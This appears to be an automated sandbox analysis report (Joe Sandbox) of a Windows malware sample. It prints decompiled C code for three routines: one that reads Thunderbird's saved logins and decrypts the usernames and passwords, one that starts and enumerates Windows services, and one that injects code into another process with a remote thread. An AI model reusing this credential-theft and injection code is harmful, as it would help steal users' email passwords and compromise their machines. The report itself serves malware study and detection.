									_t200 = E02D20192( &_v184, 0xc0000000);
									_t323 =  &_v184;
									__eflags = _t200;
									if(__eflags != 0) {
										_v52 = _t279;
										_v48 = _t279;
										E02D1FE3D( &_v184, _t381,  &_v52, _v164, _t279);
										_t208 = E02D133BF( &_v104, "encryptedUsername");
										_t210 = E02D12F22( &_v52,  &_v160);
										_t381 = _t208;
										_t281 = E02D19EB7(_t210, _t208, __eflags);
										_v108 = _t281;
										E02D15EA5(_v160);
										_t332 = _v104;
										E02D15EA5(_v104);
										__eflags = _t281;
										if(_t281 == 0) {
											_t279 = 0;
											__eflags = 0;
										} else {
											_t387 = _v32;
											_t279 = 0;
											__eflags = 0;
											_t393 = _v108;
											do {
												_v100 = 0;
												_v96 = 0;
												_v92 = 0;
												_t223 = E02D133BF( &_v116, "hostname");
												E02D19EF0( &_v40, E02D12F22( &_v52,  &_v112), __eflags, _t223, _t393);
												E02D15EA5(_v112);
												E02D15EA5(_v116);
												_t229 = E02D133BF( &_v124, "encryptedUsername");
												E02D19EF0( &_v84, E02D12F22( &_v52,  &_v120), __eflags, _t229, _t393);
												E02D15EA5(_v120);
												E02D15EA5(_v124);
												_t235 = E02D133BF( &_v132, "encryptedPassword");
												_t381 = E02D12F22( &_v52,  &_v128);
												E02D19EF0( &_v80, _t237, __eflags, _t235, _t393);
												E02D15EA5(_v128);
												E02D15EA5(_v132);
												E02D1B15E(_t387, __eflags, _v84,  &_v136);
												E02D1B15E(_t387, __eflags, _v80,  &_v144);
												E02D13437( &_v100, E02D1309D( &_v40, __eflags,  &_v68));
												E02D15EA5(_v68);
												_v68 = 0;
												E02D13437( &_v96, E02D1309D(E02D133BF( &_v140, _v136), __eflags,  &_v72));
												E02D15EA5(_v72);
												_v72 = 0;
												E02D15EA5(_v140);
												E02D13437( &_v92, E02D1309D(E02D133BF( &_v148, _v144), __eflags,  &_v76));
												E02D15EA5(_v76);
												_v76 = 0;
												E02D15EA5(_v148);
												_t395 = _t395 - 0x10;
												_v88 = 4;
												E02D11F95(_t395,  &_v100);
												E02D11FCB(_t387);
												E02D15EA5(_v80);
												E02D15EA5(_v84);
												E02D15EA5(_v40);
												_t332 =  &_v100;
												E02D113EF( &_v100);
												_t393 = _t393 - 1;
												__eflags = _t393;
											} while (_t393 != 0);
											_t392 = _v16;
											_t386 = _v20;
										}
										_t214 = PathFileExistsW(_t392);
										__eflags = _t214;
										if(_t214 != 0) {
											E02D1362D(_t395,  &_v16);
											E02D1FF0B(_t332);
										}
										 *((intOrPtr*)(_v32 + 0x84))(_v152);
										 *((intOrPtr*)(_v32 + 0x6c))();
										E02D13036( &_v52);
										_t323 =  &_v184;
									}
									E02D1FEED(_t323, __eflags);
									E02D15EA5(_t392);
									_v16 = _t279;
									E02D15EA5(_t386);
									_v20 = _t279;
									E02D15EA5(_v28);
									E02D15EA5(_v12);
									_t385 = _v32;
								}
							}
						} else {
							L5:
							E02D15EA5(_v28);
							E02D15EA5(_v12);
						}
						_push(_v36);
						_v12 = _t279;
						_push(0x104);
					}
					E02D1B627(_t385);
					_t279 = 1;
					__eflags = 1;
					E02D15EA5(_v36);
				} else {
					E02D1362D(_t395,  &_v44);
					if(E02D1B67E(_t385,  &_v704, _t289) != 0) {
						goto L3;
					} else {
						_t389 = _v24;
					}
				}
				E02D15EA5(_v44);
				E02D15EA5(_t389);
				E02D15EA5(_a4);
				return _t279;
			}




































































                                                                    0x02d1a6c8
                                                                    0x02d1a6d4
                                                                    0x02d1a6de
                                                                    0x02d1a6e1
                                                                    0x02d1a6eb
                                                                    0x02d1a6f5
                                                                    0x02d1a6ff
                                                                    0x02d1a709
                                                                    0x02d1a711
                                                                    0x02d1a716
                                                                    0x02d1a719
                                                                    0x02d1a724
                                                                    0x02d1a734
                                                                    0x02d1a747
                                                                    0x02d1a754
                                                                    0x02d1a759
                                                                    0x02d1a762
                                                                    0x02d1a783
                                                                    0x02d1a78b
                                                                    0x02d1a797
                                                                    0x02d1a7a4
                                                                    0x02d1a7ba
                                                                    0x02d1a7c2
                                                                    0x02d1a7cb
                                                                    0x02d1a7d0
                                                                    0x02d1a7d3
                                                                    0x02d1abb9
                                                                    0x02d1abb9
                                                                    0x02d1abca
                                                                    0x02d1abd0
                                                                    0x02d1abd2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1a7e5
                                                                    0x02d1a7f1
                                                                    0x02d1a7f9
                                                                    0x02d1a802
                                                                    0x02d1a805
                                                                    0x02d1a811
                                                                    0x02d1a820
                                                                    0x02d1a82c
                                                                    0x02d1a834
                                                                    0x02d1a838
                                                                    0x02d1a83a
                                                                    0x02d1a851
                                                                    0x02d1a857
                                                                    0x02d1a85d
                                                                    0x02d1a85f
                                                                    0x00000000
                                                                    0x02d1a861
                                                                    0x02d1a865
                                                                    0x02d1a868
                                                                    0x02d1a86b
                                                                    0x02d1a86d
                                                                    0x00000000
                                                                    0x02d1a86f
                                                                    0x02d1a876
                                                                    0x02d1a883
                                                                    0x02d1a88a
                                                                    0x02d1a88e
                                                                    0x02d1a89b
                                                                    0x02d1a8a2
                                                                    0x02d1a8af
                                                                    0x02d1a8b7
                                                                    0x02d1a8c4
                                                                    0x02d1a8c7
                                                                    0x02d1a8cc
                                                                    0x02d1a8cf
                                                                    0x02d1a8db
                                                                    0x02d1a8dd
                                                                    0x02d1a8e6
                                                                    0x02d1a8eb
                                                                    0x02d1a8eb
                                                                    0x02d1a8f4
                                                                    0x02d1a8fd
                                                                    0x02d1a903
                                                                    0x02d1a908
                                                                    0x02d1a914
                                                                    0x02d1a919
                                                                    0x02d1a91f
                                                                    0x02d1a921
                                                                    0x02d1a931
                                                                    0x02d1a935
                                                                    0x02d1a938
                                                                    0x02d1a945
                                                                    0x02d1a956
                                                                    0x02d1a95b
                                                                    0x02d1a96a
                                                                    0x02d1a96c
                                                                    0x02d1a96f
                                                                    0x02d1a974
                                                                    0x02d1a977
                                                                    0x02d1a97c
                                                                    0x02d1a97e
                                                                    0x02d1ab3f
                                                                    0x02d1ab3f
                                                                    0x02d1a984
                                                                    0x02d1a984
                                                                    0x02d1a987
                                                                    0x02d1a987
                                                                    0x02d1a989
                                                                    0x02d1a98c
                                                                    0x02d1a995
                                                                    0x02d1a998
                                                                    0x02d1a99b
                                                                    0x02d1a99e
                                                                    0x02d1a9b5
                                                                    0x02d1a9bf
                                                                    0x02d1a9c7
                                                                    0x02d1a9d5
                                                                    0x02d1a9ec
                                                                    0x02d1a9f6
                                                                    0x02d1a9fe
                                                                    0x02d1aa0c
                                                                    0x02d1aa1e
                                                                    0x02d1aa23
                                                                    0x02d1aa2d
                                                                    0x02d1aa35
                                                                    0x02d1aa46
                                                                    0x02d1aa57
                                                                    0x02d1aa6c
                                                                    0x02d1aa74
                                                                    0x02d1aa7c
                                                                    0x02d1aa9c
                                                                    0x02d1aaa4
                                                                    0x02d1aaaf
                                                                    0x02d1aab2
                                                                    0x02d1aad7
                                                                    0x02d1aadf
                                                                    0x02d1aaea
                                                                    0x02d1aaed
                                                                    0x02d1aaf2
                                                                    0x02d1aaf5
                                                                    0x02d1ab02
                                                                    0x02d1ab09
                                                                    0x02d1ab11
                                                                    0x02d1ab19
                                                                    0x02d1ab21
                                                                    0x02d1ab26
                                                                    0x02d1ab29
                                                                    0x02d1ab2e
                                                                    0x02d1ab2e
                                                                    0x02d1ab2e
                                                                    0x02d1ab37
                                                                    0x02d1ab3a
                                                                    0x02d1ab3a
                                                                    0x02d1ab42
                                                                    0x02d1ab48
                                                                    0x02d1ab4a
                                                                    0x02d1ab53
                                                                    0x02d1ab58
                                                                    0x02d1ab5d
                                                                    0x02d1ab67
                                                                    0x02d1ab71
                                                                    0x02d1ab77
                                                                    0x02d1ab7c
                                                                    0x02d1ab7c
                                                                    0x02d1ab82
                                                                    0x02d1ab89
                                                                    0x02d1ab90
                                                                    0x02d1ab93
                                                                    0x02d1ab9b
                                                                    0x02d1ab9e
                                                                    0x02d1aba6
                                                                    0x02d1abab
                                                                    0x02d1abab
                                                                    0x02d1a86d
                                                                    0x02d1a83c
                                                                    0x02d1a83c
                                                                    0x02d1a83f
                                                                    0x02d1a847
                                                                    0x02d1a847
                                                                    0x02d1abae
                                                                    0x02d1abb1
                                                                    0x02d1abb4
                                                                    0x02d1abb4
                                                                    0x02d1abda
                                                                    0x02d1abe4
                                                                    0x02d1abe4
                                                                    0x02d1abe5
                                                                    0x02d1a764
                                                                    0x02d1a76b
                                                                    0x02d1a779
                                                                    0x00000000
                                                                    0x02d1a77b
                                                                    0x02d1a77b
                                                                    0x02d1a77b
                                                                    0x02d1a779
                                                                    0x02d1abed
                                                                    0x02d1abf4
                                                                    0x02d1abfc
                                                                    0x02d1ac07

                                                                    APIs
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D1C118: lstrcpyW.KERNEL32 ref: 02D1C154
                                                                      • Part of subcall function 02D1C118: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 02D1C162
                                                                      • Part of subcall function 02D1C118: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,02D1A729,?,00000104,00000000), ref: 02D1C17B
                                                                      • Part of subcall function 02D1C118: RegQueryValueExW.ADVAPI32(02D1A729,Path,00000000,?,?,?,?,00000104,00000000), ref: 02D1C198
                                                                      • Part of subcall function 02D1C118: RegCloseKey.ADVAPI32(02D1A729,?,00000104,00000000), ref: 02D1C1A1
                                                                    • GetBinaryTypeW.KERNEL32(?,?), ref: 02D1A747
                                                                      • Part of subcall function 02D1362D: lstrcpyW.KERNEL32 ref: 02D13657
                                                                      • Part of subcall function 02D1B67E: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 02D1B6AC
                                                                      • Part of subcall function 02D1B67E: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B6B5
                                                                      • Part of subcall function 02D1B67E: PathFileExistsW.SHLWAPI(02D1A760,.dll,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?,msvcr120.dll,?,nss3.dll), ref: 02D1B7A3
                                                                    • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 02D1ABCA
                                                                      • Part of subcall function 02D1B67E: PathFileExistsW.SHLWAPI(02D1A760,.dll,?,02D1A760,?,00000104,00000000), ref: 02D1B7FF
                                                                      • Part of subcall function 02D1B67E: LoadLibraryW.KERNEL32(?,02D1A760,?,00000104,00000000), ref: 02D1B83E
                                                                      • Part of subcall function 02D1B67E: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B849
                                                                      • Part of subcall function 02D1B67E: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B854
                                                                      • Part of subcall function 02D1B67E: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B85F
                                                                      • Part of subcall function 02D1B67E: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B86A
                                                                      • Part of subcall function 02D1B67E: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B957
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad$CurrentDirectorylstrcpy$ExistsFilePathlstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValuelstrcat
                                                                    • String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
                                                                    • API String ID: 1065485167-1863067114
                                                                    • Opcode ID: aff3a7f073842810070ffa697cf68d3b8d069444416deefde412ebc21bd557d4
                                                                    • Instruction ID: 240b250751bff00a8c008bbbfa29b79010b524bfc1cf1b8a13809dfc36b9da5d
                                                                    • Opcode Fuzzy Hash: aff3a7f073842810070ffa697cf68d3b8d069444416deefde412ebc21bd557d4
                                                                    • Instruction Fuzzy Hash: F2E1E7B1D00118ABEB15EBA0EC91DEEB77AEF54304F50406AE506A7B90DF356E49CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1D508 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 55servicesleepCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1D508(short** _a4) {
				void* _t2;
				int _t8;
				void* _t13;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t2 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t17 = _t2;
				if(_t17 != 0) {
					_t13 = OpenServiceW(_t17,  *_a4, 0x10);
					if(_t13 != 0) {
						if(StartServiceW(_t13, 0, 0) != 0) {
							L6:
							_t15 = 1;
							L7:
							CloseServiceHandle(_t17);
							CloseServiceHandle(_t13);
							_t8 = _t15;
							L8:
							return _t8;
						}
						if(GetLastError() != 0x420) {
							goto L7;
						}
						Sleep(0x7d0);
						if(StartServiceW(_t13, 0, 0) == 0) {
							goto L7;
						}
						goto L6;
					}
					CloseServiceHandle(_t17);
					_t8 = 0;
					goto L8;
				}
				return _t2;
			}








                                                                    0x02d1d514
                                                                    0x02d1d517
                                                                    0x02d1d51d
                                                                    0x02d1d521
                                                                    0x02d1d532
                                                                    0x02d1d536
                                                                    0x02d1d54e
                                                                    0x02d1d575
                                                                    0x02d1d577
                                                                    0x02d1d578
                                                                    0x02d1d57f
                                                                    0x02d1d582
                                                                    0x02d1d584
                                                                    0x02d1d586
                                                                    0x00000000
                                                                    0x02d1d586
                                                                    0x02d1d55b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1d562
                                                                    0x02d1d573
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1d573
                                                                    0x02d1d539
                                                                    0x02d1d53f
                                                                    0x00000000
                                                                    0x02d1d53f
                                                                    0x02d1d58a

                                                                    APIs
                                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 02D1D517
                                                                    • OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 02D1D52C
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D539
                                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 02D1D546
                                                                    • GetLastError.KERNEL32 ref: 02D1D550
                                                                    • Sleep.KERNEL32(000007D0), ref: 02D1D562
                                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 02D1D56B
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D57F
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D582
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
                                                                    • String ID: ServicesActive
                                                                    • API String ID: 104619213-3071072050
                                                                    • Opcode ID: c52b98ebf536f75d1ec08bdbc108d1cd43dcb661d4cc1521842604a6f71ce7e0
                                                                    • Instruction ID: bcd7b9a5253640592b41760d50b90a67f8823f716520d4de05ae3a15b8ebcb2a
                                                                    • Opcode Fuzzy Hash: c52b98ebf536f75d1ec08bdbc108d1cd43dcb661d4cc1521842604a6f71ce7e0
                                                                    • Instruction Fuzzy Hash: B001D471B8026477E2301B22BD4DF5B3F6DDBE6769B510424FA06D2300DB64CD54C6B0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1DA5B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167servicestringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 89%
                                                                    			E02D1DA5B(intOrPtr __ecx) {
				char _v8;
				signed int _v12;
				char _v16;
				char _v20;
				short* _v24;
				signed int _v28;
				short** _v32;
				short* _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr* _t66;
				char* _t69;
				void* _t90;
				intOrPtr* _t91;
				intOrPtr _t92;
				intOrPtr _t105;
				intOrPtr* _t112;
				intOrPtr _t113;
				char _t114;
				signed int _t115;
				signed int _t116;
				void* _t117;
				void* _t119;

				_t113 = __ecx;
				_v44 = __ecx;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v36 = 0;
				_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
				if(_t90 == 0) {
					L9:
					_v40 = _v40 & 0x00000000;
					L10:
					E02D15EA5(_v24);
					return _v40;
				}
				_v40 = 1;
				_v32 = _t113 + 0x28;
				while(1) {
					L2:
					_v16 = 0;
					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, 0, 0,  &_v20,  &_v8,  &_v16, 0);
					_t114 = _v20;
					_t66 = E02D15EFF(_t114);
					_t112 = _t66;
					_t69 =  &_v20;
					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, _t112, _t114, _t69,  &_v8,  &_v16, 0);
					if(_t69 == 0 && GetLastError() != 0xea) {
						goto L9;
					}
					CloseServiceHandle(_t90);
					_t115 = 0;
					if(_v8 <= 0) {
						goto L9;
					}
					_t91 = _t112;
					while( *_t91 != 0) {
						E02D135E5( &_v12,  *_t91);
						if(E02D13248( &_v12, _v32) != 0) {
							_t116 = _t115 * 0x2c;
							E02D13437( &_v24, E02D135E5( &_v28,  *((intOrPtr*)(_t116 + _t112))));
							E02D15EA5(_v28);
							_t92 = _v44;
							_v28 = _v28 & 0x00000000;
							 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t116 + _t112 + 0x24));
							E02D15EA5(_v12);
							_v12 = _v12 & 0x00000000;
							if( *((intOrPtr*)(_t92 + 0x2c)) != 0) {
								_t105 = _v8;
								_t117 = 0;
								if(_t105 == 0) {
									goto L10;
								}
								while( *_t112 != 0) {
									if( *((intOrPtr*)(_t112 + 0x24)) !=  *((intOrPtr*)(_t92 + 0x2c))) {
										L21:
										_t117 = _t117 + 1;
										_t112 = _t112 + 0x2c;
										if(_t117 < _t105) {
											continue;
										}
										goto L10;
									}
									E02D135E5( &_v12,  *_t112);
									if(lstrcmpW(_v12, _v24) != 0) {
										E02D135E5(_t119,  *_t112);
										E02D121BD(_t92 + 0x44,  &_v12);
									}
									E02D15EA5(_v12);
									_v12 = _v12 & 0x00000000;
									_t105 = _v8;
									goto L21;
								}
								goto L10;
							}
							if(_v36 == 1) {
								goto L9;
							}
							E02D1D49C(_v32, 2);
							E02D1D508(_v32);
							_v36 = 1;
							E02D11099(_t112);
							_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
							if(_t90 != 0) {
								goto L2;
							}
							goto L9;
						}
						E02D15EA5(_v12);
						_v12 = _v12 & 0x00000000;
						_t91 = _t91 + 0x2c;
						_t115 = _t115 + 1;
						if(_t115 < _v8) {
							continue;
						}
						goto L9;
					}
					goto L9;
				}
				goto L9;
			}


























                                                                    0x02d1da66
                                                                    0x02d1da70
                                                                    0x02d1da73
                                                                    0x02d1da76
                                                                    0x02d1da79
                                                                    0x02d1da7c
                                                                    0x02d1da7f
                                                                    0x02d1da88
                                                                    0x02d1da8c
                                                                    0x02d1db3c
                                                                    0x02d1db3c
                                                                    0x02d1db40
                                                                    0x02d1db43
                                                                    0x02d1db4f
                                                                    0x02d1db4f
                                                                    0x02d1da95
                                                                    0x02d1da9c
                                                                    0x02d1da9f
                                                                    0x02d1da9f
                                                                    0x02d1daa9
                                                                    0x02d1dab9
                                                                    0x02d1dabf
                                                                    0x02d1dac4
                                                                    0x02d1dacb
                                                                    0x02d1dad5
                                                                    0x02d1dae2
                                                                    0x02d1daea
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1dafa
                                                                    0x02d1db00
                                                                    0x02d1db05
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1db07
                                                                    0x02d1db09
                                                                    0x02d1db13
                                                                    0x02d1db25
                                                                    0x02d1db50
                                                                    0x02d1db62
                                                                    0x02d1db6a
                                                                    0x02d1db6f
                                                                    0x02d1db79
                                                                    0x02d1db7d
                                                                    0x02d1db80
                                                                    0x02d1db85
                                                                    0x02d1db8d
                                                                    0x02d1dbd0
                                                                    0x02d1dbd3
                                                                    0x02d1dbd7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1dbdd
                                                                    0x02d1dbec
                                                                    0x02d1dc29
                                                                    0x02d1dc29
                                                                    0x02d1dc2a
                                                                    0x02d1dc2f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1dc31
                                                                    0x02d1dbf3
                                                                    0x02d1dc06
                                                                    0x02d1dc0d
                                                                    0x02d1dc15
                                                                    0x02d1dc15
                                                                    0x02d1dc1d
                                                                    0x02d1dc22
                                                                    0x02d1dc26
                                                                    0x00000000
                                                                    0x02d1dc26
                                                                    0x00000000
                                                                    0x02d1dbdd
                                                                    0x02d1db95
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1db9d
                                                                    0x02d1dba3
                                                                    0x02d1dba9
                                                                    0x02d1dbac
                                                                    0x02d1dbc1
                                                                    0x02d1dbc5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1dbcb
                                                                    0x02d1db2a
                                                                    0x02d1db2f
                                                                    0x02d1db33
                                                                    0x02d1db36
                                                                    0x02d1db3a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1db3a
                                                                    0x00000000
                                                                    0x02d1db09
                                                                    0x00000000

                                                                    APIs
                                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 02D1DA82
                                                                    • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 02D1DAB9
                                                                      • Part of subcall function 02D15EFF: GetProcessHeap.KERNEL32(00000008,?,02D12FA7,02D15A42,?,?,02D203FD,02D15A42,?,?,745D0770,00000000,?,02D15A42,00000000), ref: 02D15F02
                                                                      • Part of subcall function 02D15EFF: RtlAllocateHeap.NTDLL(00000000,?,02D203FD,02D15A42,?,?,745D0770,00000000,?,02D15A42,00000000), ref: 02D15F09
                                                                    • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 02D1DAE2
                                                                    • GetLastError.KERNEL32 ref: 02D1DAEC
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1DAFA
                                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 02D1DBBB
                                                                    • lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 02D1DBFE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
                                                                    • String ID: ServicesActive
                                                                    • API String ID: 899334174-3071072050
                                                                    • Opcode ID: e2622f4dede44bac319d71da4e61523086f4204aafd4abe87bb9cd3ccd1d0f7a
                                                                    • Instruction ID: dc36aa9fdbd9cf0f6a13038dfd1f82fc740cbe6fe3106946e833e179876f0fb5
                                                                    • Opcode Fuzzy Hash: e2622f4dede44bac319d71da4e61523086f4204aafd4abe87bb9cd3ccd1d0f7a
                                                                    • Instruction Fuzzy Hash: 42516E71D00219BBEB15DFA0E995BEEB7BAEF58305F100469E502B6780EB749E44CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D179E8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97injectionmemorythreadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 88%
                                                                    			E02D179E8(void* __ecx, long __edx, long _a4) {
				long _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				signed int _t17;
				void* _t19;
				void* _t22;
				long _t32;
				_Unknown_base(*)()* _t38;
				void* _t40;

				_t32 = __edx;
				_v24 = __ecx;
				if( *0x2d29694 == 0) {
					 *0x2d29694 = E02D18617() != 0;
				}
				_t17 = OpenProcess(0x1fffff, 0, _a4);
				_t40 = _t17;
				if(_t40 != 0) {
					_t38 = VirtualAllocEx(_t40, 0, 0x100000, 0x3000, 0x40);
					if(_t38 == 0) {
						L12:
						_push(0xfffffffe);
						L13:
						_pop(_t19);
						L14:
						return _t19;
					}
					_v16 = _v16 & 0x00000000;
					VirtualProtectEx(_t40, _t38, 0x100000, 0x40,  &_v16);
					_t22 = VirtualAllocEx(_t40, 0x33370000, 0x100, 0x3000, 0x40);
					_v20 = _t22;
					if(_t22 == 0) {
						goto L12;
					}
					_v8 = _v8 & 0x00000000;
					if(WriteProcessMemory(_t40, _v20, "XXXXXX", E02D11133("XXXXXX"),  &_v8) == 0 || _v8 != E02D11133("XXXXXX")) {
						L11:
						_push(0xfffffffd);
						goto L13;
					} else {
						_v12 = _v12 & 0x00000000;
						if(WriteProcessMemory(_t40, _t38, _v24, _t32,  &_v12) == 0 || _v12 != _t32) {
							goto L11;
						} else {
							_t19 = CreateRemoteThread(_t40, 0, 0, _t38, 0, 0, 0);
							goto L14;
						}
					}
				} else {
					return _t17 | 0xffffffff;
				}
			}














                                                                    0x02d179f7
                                                                    0x02d179f9
                                                                    0x02d179fc
                                                                    0x02d17a05
                                                                    0x02d17a05
                                                                    0x02d17a16
                                                                    0x02d17a1c
                                                                    0x02d17a20
                                                                    0x02d17a40
                                                                    0x02d17a44
                                                                    0x02d17ae9
                                                                    0x02d17ae9
                                                                    0x02d17aeb
                                                                    0x02d17aeb
                                                                    0x02d17aec
                                                                    0x00000000
                                                                    0x02d17aec
                                                                    0x02d17a4a
                                                                    0x02d17a5b
                                                                    0x02d17a73
                                                                    0x02d17a79
                                                                    0x02d17a7e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d17a80
                                                                    0x02d17aa5
                                                                    0x02d17ae5
                                                                    0x02d17ae5
                                                                    0x00000000
                                                                    0x02d17ab7
                                                                    0x02d17ab7
                                                                    0x02d17acd
                                                                    0x00000000
                                                                    0x02d17ad4
                                                                    0x02d17add
                                                                    0x00000000
                                                                    0x02d17add
                                                                    0x02d17acd
                                                                    0x02d17a22
                                                                    0x00000000
                                                                    0x02d17a22

                                                                    APIs
                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?), ref: 02D17A16
                                                                      • Part of subcall function 02D18617: GetCurrentProcess.KERNEL32(02D29698,02D17A03,?,?,?,?), ref: 02D1861C
                                                                      • Part of subcall function 02D18617: IsWow64Process.KERNEL32(00000000), ref: 02D18623
                                                                      • Part of subcall function 02D18617: GetProcessHeap.KERNEL32 ref: 02D18629
                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040,00000000), ref: 02D17A3A
                                                                    • VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 02D17A5B
                                                                    • VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 02D17A73
                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 02D17A9D
